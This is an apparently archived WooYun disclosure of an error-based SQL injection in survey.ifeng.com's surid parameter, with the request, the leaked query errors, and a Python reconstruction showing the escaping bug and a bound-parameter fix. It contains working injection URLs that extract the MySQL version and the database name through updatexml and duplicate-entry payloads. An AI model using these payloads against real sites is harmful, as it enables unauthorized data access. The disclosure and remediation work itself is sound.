WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-02-26: Details sent to the vendor, awaiting vendor handling
2015-02-27: Vendor confirmed; details disclosed to the vendor only
2015-03-09: Details disclosed to core white hats and relevant domain experts
2015-03-19: Details disclosed to regular white hats
2015-03-29: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public
Error-based SQL injection on an ifeng.com site allows data to be read directly
Host: survey.ifeng.com, parameter surid. The numeric column receives a cleaned value ('2616'), but the full request is JSON-encoded and concatenated into the `userinfo` string literal; the logged query shows the injected quote arriving as `\\'`, where the backslash escapes only itself and the quote terminates the literal, so everything after it is parsed as SQL.
GET /survey/request.php?callback=jsonp1424157819222&act=postsurvey&surid=2616'&sur%5B5491%5D%5B%5D=21758&ref=http://bbs.ifeng.com/talk/special/index.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://bbs.ifeng.com/talk/special/index.shtml
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: survey.ifeng.com
Cookie: Q37_sid=SoraD6; Q37_oldtopics=D5898341D18938212D18939153D18938341D18938190D18939052D18937946D18404838D18938230D17144416D18492322D18870175D18689737D18846108D15119594D15109969D15180577D18936949D18936953D18938709D18938715D18938707D18938712D; Q37_fid284=1424155688; Q37_visitedfid=349D491D500D497D469D379D364D354D728D218D550; Q37_fid218=1424143815; Q37_fid364=1424146788; Q37_fid354=1424072043; Q37_fid453=1424138799; Q37_fid379=1424144618; Q37_fid469=1424080280; Q37_fid497=1424087992; Q37_fid499=1424143254; Q37_fid500=1424148976; Q37_fid491=1424080870
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 17 Feb 2015 07:32:18 GMT
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Load-Balancing: survey144
Set-Cookie: array_pkic2=rs_http_pkandsurvey_145
Connection: Keep-alive
Content-Length: 1187

MySQL Error
Message: MySQL Query Error
SQL: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","surid":"2616\\'","sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","ip":"116.231.89.203"}')
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sur":{"5491":["21758"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtm' at line 1
Errno.: 1064
Click here to seek help. (link to http://faq.comsenz.com/?type=mysql&dberrno=1064&dberror=...)
POC:

1. MySQL version via updatexml() (surid moved to the end of the query string so the payload closes the VALUES clause and `#` comments out the rest):

http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%20updatexml%281,concat%280x7e,%28SELECT%20@@version%29,0x7e%29,1%29%29%23

MySQL Error
Message: MySQL Query Error
SQL: INSERT INTO sur_survey_user (`surid`, `userinfo`) VALUES ('2616', '{"callback":"jsonp1424157819222","act":"postsurvey","sur":{"5491":["2175"]},"ref":"http:\/\/bbs.ifeng.com\/talk\/special\/index.shtml","surid":"2616\\'+ updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))#","ip":"116.237.88.204"}')
Error: XPATH syntax error: '~5.1.45-Community-Server-log~'
Errno.: 1105
Click here to seek help.

2. Database name via the duplicate-entry (floor(rand(0)*2) ... GROUP BY) trick:

http://survey.ifeng.com/survey/request.php?callback=jsonp1424157819222&act=postsurvey&sur%5B5491%5D%5B%5D=2175&ref=http://bbs.ifeng.com/talk/special/index.shtml&surid=2616%27%2b%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28SELECT%20distinct%20concat%280x7e,schema_name,0x7e%29%20FROM%20information_schema.schemata%20LIMIT%201,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%29%23

Error: Duplicate entry '~ifeng_survey~1' for key 'group_key'
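The following is an added example, not code from the report or from ifeng.com, that reproduces the escaping-order bug the logged queries reveal and shows the fix. It assumes the site escaped the request with addslashes() (or magic quotes) before json_encode(); the report only shows the resulting `\\'`, so that is an inference. The request dictionaries, `php_intval`, the literal scanner and the sqlite3 stand-in for MySQL are all constructed for the example; with a MySQL driver the placeholder would be `%s` rather than `?`.

```python
import json
import re
import sqlite3

# Constructed request parameters. Only the surid payloads follow the report;
# the key order mirrors it: surid before the rest for the probe, last for the POC.
BENIGN = {"act": "postsurvey", "surid": "2616"}
PROBE = {"surid": "2616'", "act": "postsurvey"}
POC = {"act": "postsurvey",
       "surid": "2616'+ updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))#"}


def addslashes(s):
    """Emulates PHP addslashes(): backslash before ', ", \\ and NUL.
    Assumed (not shown in the report) to run on the request before json_encode."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_intval(s):
    """Emulates PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def build_insert_vulnerable(params):
    """Reconstruction of the query pattern in the report: the first column is
    cast to int, but the already-escaped request is JSON-encoded and spliced
    into the second column as a raw string literal. json.dumps doubles the
    backslash that addslashes added, exactly as PHP json_encode does."""
    escaped = {k: addslashes(v) for k, v in params.items()}
    userinfo = json.dumps(escaped, separators=(",", ":"))
    return ("INSERT INTO sur_survey_user (`surid`, `userinfo`) "
            "VALUES ('%d', '%s')" % (php_intval(params["surid"]), userinfo))


def mysql_literal_end(sql, start):
    """Index just past the single-quoted literal opening at sql[start], under
    MySQL's default rules: backslash escapes the next character, '' is a quote."""
    i = start + 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\":
            i += 2
        elif ch == "'":
            if sql[i + 1:i + 2] == "'":
                i += 2
            else:
                return i + 1
        else:
            i += 1
    raise ValueError("unterminated string literal")


def sql_after_userinfo(sql):
    """Text MySQL parses as SQL once the userinfo literal has closed.
    For a well-formed query this is exactly ')'; anything else is injected SQL."""
    first = sql.index("VALUES ('") + len("VALUES (")
    second = sql.index("'", mysql_literal_end(sql, first))
    return sql[mysql_literal_end(sql, second):]


def store_hardened(params):
    """Fix: encode the raw request (no pre-escaping) and bind it as a parameter,
    so no byte of it is ever parsed as SQL. sqlite3 stands in for MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sur_survey_user (surid INTEGER, userinfo TEXT)")
    conn.execute("INSERT INTO sur_survey_user (surid, userinfo) VALUES (?, ?)",
                 (php_intval(params["surid"]),
                  json.dumps(params, separators=(",", ":"))))
    surid, userinfo = conn.execute(
        "SELECT surid, userinfo FROM sur_survey_user").fetchone()
    return surid, json.loads(userinfo)["surid"]


if __name__ == "__main__":
    for name, p in (("benign", BENIGN), ("probe", PROBE), ("poc", POC)):
        print(name, "->", repr(sql_after_userinfo(build_insert_vulnerable(p))))
    print("hardened:", store_hardened(POC))
```

Run as a script, the probe case yields a tail beginning `","act":...`, the same leftover JSON the report's first error message quotes, and the POC case yields a tail beginning `+ updatexml(...)#`, with `#` commenting out the remainder of the literal. The hardened path stores the payload verbatim as data, because the quote never reaches the SQL parser. The general lesson is that SQL escaping must be the last transformation applied to a value, or, better, replaced by bound parameters.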
Severity: High
Vulnerability rank: 10
Confirmed: 2015-02-27 18:31
Thank you very much for your help with ifeng.com's information security.
None